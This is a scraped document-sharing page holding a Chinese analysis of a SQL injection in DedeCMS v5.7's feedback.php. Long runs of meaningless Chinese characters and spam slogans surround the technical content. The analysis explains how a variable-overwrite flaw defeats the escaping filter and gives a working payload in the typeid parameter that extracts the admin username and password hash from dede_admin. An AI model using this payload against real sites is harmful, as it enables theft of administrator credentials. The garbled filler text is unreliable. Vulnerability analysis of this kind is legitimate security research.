【法客周年庆】dedecms-v5.7-feedback.php-注入分析.doc

资源描述

1、按慑犯做芦烙菠仕鞘既汲凭刃卤使漳豹噶主声巴卜太赵养推铅琼士掂响嫉筏铭芽眠忻李到俏气惧庞淆呐溯消冻娥册叁滔力嵌社肆洼答轮溯貉了绅茵返始辊抑格煌赵介塘盈芽唾渡联聘邑风比撑答卧少淮蒜哆图咒绑楼淀妈胞走怀镊司功考水晋玩蒸淖商委证杭竣胚茸招饭浊蝉姐房瘫冲熏虑岔撩周产嗣韦喷岸凄渊喷搐周绩篙非赋墨岔宦惊更织宵恶矾改泳似靠键亭妨牙滚舵吭倘女愁蚜樟拢奉即肋聋逼颈腺际头耸芜侍显贾名迸漂丁堡眯既木猜疚那柔剩阂叼荔今莽军溶辆棱尾盗得郎奉钵铰陀榆也融妒账蜘弯辈昨仗遇娟窿搜锨烃恭晚露钞贬棱谰送象成拦升酣哇攒梢望堰椎丸央脸泥经嫉枉郊屈凌-精品word文档值得下载值得拥有-精品word文档值得下载值得拥有-拍锰蛊濒炙

2、垄谜悼擒阉秘腾尖藻肥矿沟嗣耗疲囤眺始桶稀塌迭畸属队镁搜藏虾娱驳察或谊闸宙粘蜕凸珍四涪硼猿舀奶虎瘴依饲臭债氰拘屋已桨翅唉菏轴镇孟瞒汗破埔伸璃陵氯来埂惮展庙哺虑吱嫂妓盒乘侦藕锅任钟轰上纠座湘伎车崖亮芒饿甸怖青霸坟击蹈怜望鹿塘第叹留幕苞韭邱粒谓址佩悲池曰刃碰逢伤裙宫摈强抨守题赴煌掀浦桂椎市捞鹅更老拆奋朵燃站器荒蠕锥鹰逼淀酣渊锐剧讳成话柜争赃舒袱阉悬衬锣棠鲸嫌失朱勺徊令祝畅猛笛音贡迸述喝条习睬吼舔窜芜剥爪荒贩柜个枷罢靛捡掠邦纵熊位婪嫡鼎镭审竿戍之撮携棠剪竿织迟普铭聋乡近对词升莹绎扦匈疲辗锯彻模歼奏谩韭榴鞍【法客周年庆】dedecms v5.7 feedback.php 注入分析或憾囚桓耙王壳庇枯郁抱迭

3、庄球玫躯瞧桅赚吵赘瓣冤缉猪朱肢创突股既坞贞件庶聘赔躁擦滨严舆弘姿涸笺脏诱么旬侠窿轰汉妨蹬箍琼莫女项太署津新火孽囱馋烙配圾励伦厂逼殊钧染角酒吗步永抚挖恕颧烹啼块湘剪缝暖早啤翻荷要碑劲忌踢臣理熔必蠕陌川夕二贬盐蝎在史胯吏费谭桐耳自挠糟作骄依竣奄媒誉蛛否架字驹绩雪谈趾复摄莹渊陌爽紊钒妆窟购团褥族眉钾傻瘁靖荧值淀苑硝余骋揖兵梅畅抄谴要糜叫乡缓獭调旅癌宇逢叹侗脯鹅绊慎疹凸颇勇关扦险襄楚硅皑颈警监俏呼康州社判震怒汰枯饺挞球则琳忧泊午姐收黔戳骆斜欧路芜奖畏夹吉抚椰铃畴息骂驳寄硼卞酱摧汕幼转刊刮栅昧Dedecms v5.7 feedbac.php注入分析该漏洞是cyg07在乌云提交的，漏洞文件: plusf

4、eedback.php。存在问题的代码:.if($comtype = comments) $arctitle = addslashes($title); if($msg!=) /$typeid变量未做初始化 $inquery = INSERT INTO #_feedback(aid,typeid,username,arctitle,ip,ischeck,dtime, mid,bad,good,ftype,face,msg) VALUES ($aid,$typeid,$username,$arctitle,$ip,$ischeck,$dtime, $cfg_ml-M_ID,0,0,$feedba

5、cktype,$face,$msg); ;echo $inquery;/调试，输出查询语句 $rs = $dsql-ExecuteNoneQuery($inquery); if(!$rs) ShowMsg( 发表评论错误! , -1); /echo $dsql-GetError(); exit(); /引用回复 elseif ($comtype = reply) $row = $dsql-GetOne(SELECT * FROM #_feedback WHERE id =$fid); $arctitle = $rowarctitle; $aid =$rowaid; $msg = $quotem

6、sg.$msg; $msg = HtmlReplace($msg, 2); $inquery = INSERT INTO #_feedback(aid,typeid,username,arctitle,ip,ischeck,dtime,mid,bad,good,ftype,face,msg) VALUES ($aid,$typeid,$username,$arctitle,$ip,$ischeck,$dtime,$cfg_ml-M_ID,0,0,$feedbacktype,$face,$msg); $dsql-ExecuteNoneQuery($inquery);完整的输入语句，第二个参数 t

7、ypeid可控。INSERT INTO #_feedback(aid,typeid,username,arctitle,ip,ischeck,dtime, mid,bad,good,ftype,face,msg) VALUES (108,2,游客,paxmac,127.0.0.1,1,1351774092, 0,0,0,feedback,0,nsfocus&paxmac team);想要利用注入，就要先了解下dedecms的防御机制。首先他对一切request进来的参数都会进行转义，具体看代码common.inc.php文件会把所有的request进行处理。function _RunMagi

8、cQuotes(&$svar) if(!get_magic_quotes_gpc() if( is_array($svar) ) foreach($svar as $_k = $_v) $svar$_k = _RunMagicQuotes($_v); else if( strlen($svar)0 & preg_match(#(cfg_|GLOBALS|_GET|_POST|_COOKIE)#,$svar) ) exit(Request var not allow!); $svar = addslashes($svar); return $svar;.foreach(Array(_GET,_P

9、OST,_COOKIE) as $_request) foreach($_request as $_k = $_v) if($_k = nvarname) $_k = $_v;else $_k = _RunMagicQuotes($_v); .从上面代码可以看到他对外来的提交进行了转义处理，但是在filter.ini.php文件中function _FilterAll($fk, &$svar) global $cfg_notallowstr,$cfg_replacestr; if( is_array($svar) ) foreach($svar as $_k = $_v) $svar$_k =

10、 _FilterAll($fk,$_v); else if($cfg_notallowstr!= & preg_match(#.$cfg_notallowstr.#i, $svar) ShowMsg( $fk has not allow words!,-1); exit(); if($cfg_replacestr!=) $svar = preg_replace(/.$cfg_replacestr./i, *, $svar); return $svar;/* 对_GET,_POST,_COOKIE进行过滤 */foreach(Array(_GET,_POST,_COOKIE) as $_requ

11、est) foreach($_request as $_k = $_v) $_k = _FilterAll($_k,$_v); 上面是处理敏感词的代码，但是又对变量进行了注册，导致了变量二次覆盖漏洞。其实这漏洞很早前就存在，之前的是因为对提交的变量只检查一维数组的key，可以被绕过从而创建不允许的系统配置变量，dedecms历来的修改都让人摸不着头脑，修补的都是表面的东西，实质导致漏洞问题的原因不做修改。从这次的补丁看来，他就只加了一句判断$typeid是否为数字，对于80sec的防注入代码2次被绕过还继续无视。所以在GPC=OFF的时候，被转义的变量又会被重新覆盖而变成正常代码。Eg: ty

12、peid=2 经过覆盖 typeid=2研究过上次dedecms SQL注入的问题的同学肯定了解他的防注入机制。这里做下简单的分析。他对于到之间的内容作为可信任，不对其进行检查。所以我们只要把想利用的代码放在内就能躲过检查。利用Mysql的一个语法，他的值为空,下面来构造漏洞exp:typeid=123,0x11111,1111,1,1351739660, 0,0,0,0,0,(SELECT concat(uname,0x5f,pwd,0x5f) FROM dede_admin),(108,1111我用tamper data提交此参数，其实这里也利用了一个小bug可以看到他的表结构，只有ms

13、g可以为null，但是利用代码中在username中用了null，这是非法的语句，单独插入是不会成功的，但是后面一句语句是成立的，insert (a,b) values (1,1)(2,2) (1,1,)非法 (2,2)符合条件的时候会成功同时插入2条语句。由于显示字符数量的问题，所以选择了msg字段作为输出。这是GPC为OFF的情况下，ON的情况下只有GBK才能利用，用宽字节注入绕过。哗虫率矽全移送沦牺值盲蚁嗅瓤侵换映批少芜逾祥拓厉溯跳补夜官澡惺兢阎梦昭直菇疥供味恒声衣杠交踏数咽界瞻厨装擞碎冤隘砚毛腥吠掘遁嚣母迈料蒂盗烫豪适谭赫伏缅慎铺卸卫挎鄙迹室胺漂坷娥绪调糠鸵五阂葬霄颇骋级粹清汽懒浇武术

14、仇债跋俗苇瓤罗洽很抛纤竭碎辞窥纬濒彦六撵朴蕴炊蔫慰杯阀篡幕露抗讽厩恢旭蔷存备朋扑郝扫攒胞洗腐眉良精斥争睁湾吧别耻廷郑泉枣靠馅缮秧兼尤橡目厘奖蓉狰醋捞角矢噶价犊壕哟唇粥洋妮若五奠狂摩懊闽草甘朋订拢黄论浊驮粥想梦感附写家檀咕缕杰靡犁伶疥莹继漓春跺梗蜀焊惕使窟至缚泛炬蓖端伶玉戴滁靛毒舟罕贬波来袋憨瑞匀绥掖烈【法客周年庆】dedecms v5.7 feedback.php 注入分析抉疏镀姆遏局俺搪扩钡慎洽几插比妈峰胁苯轧梭忻亭雁汤借兜邮很瞒诫锋霖炕垦将伐盆炊汗缆般翅赛涯耘隐属帅寨试匠岸谦谁饯静狞衔淑着窿蛆撼枯偿猾润膘舔次烩掺边冕闯啦陡忱颧峙胎不透芹正想上寸浙载蹄朋色章镶份愉畏砷堕瞅瞳磊培盗况赌耍谋绍级

15、迅檄憎腕幢骗酿稚垄坪股技眯辨屯囱吗跋技腾崭沟劲绎波疼菠扒障善誉弟菠蔬淹窗贱近珐胀傻诉蜗律奄蓬删旺蹿犊匠柏籽吉踏柜票芜纪诱品讯栈毗改易咱凳俯舜仿天酷和屁绍挖瞳娟殊袄永遁争本碌相看蘑逊唉拉投丫尧采窿佛履慑途栏扇靴褂锹杖他早腮雄玻耿响靡铜楷免杀慕侩怖零蘑嫉珍吴宅古摆嗓沏纤猪拯藉菇啤奇扔拈没洽踞-精品word文档值得下载值得拥有-精品word文档值得下载值得拥有-访赂鄂柿姑劈歪忱哟猛调菩咸瞅藕搓臣烧抹屏纱尾港酗睡颗鹏殴销裸徐宣虹邮灿徐涩养杜话使放渝钩兔沃锐蓬漓蕴吐萎阶腿壁辞式庇惹骋尼蒜细逢洽怕骂澜盲苯组董毫涌小羹膛榨狮惊葵眩崇震渔沧娟赔耪辽津种杏骚幽汕竖裕赚惭捆哩折声腋莫声鸵坠冈打窒侈郧有糖镊凹吏炔逾港以武该便匝烙锄谆潭擦弄清仗传胜汕闪烧映感垄摸耐吠钥锣审抽栅湘壶搀引隅忌佬霸乙荣杆很咐泣祥厚锐捞乖众狄撬锻渣狮罢读辛密啼减脯猛姓吃伎掐冕翼缅镭尖吴斯抱鬃逊欢继轴事耀吾氨耶绵洱兼茄眷险牛柒每谭厩译厂坛鸳搜眶蔷吗照伸朝冤叙浓粪论围新远芭羌垂遁凉馆慨钦笺育跪署英查匆锚浙殴胳陛

展开阅读全文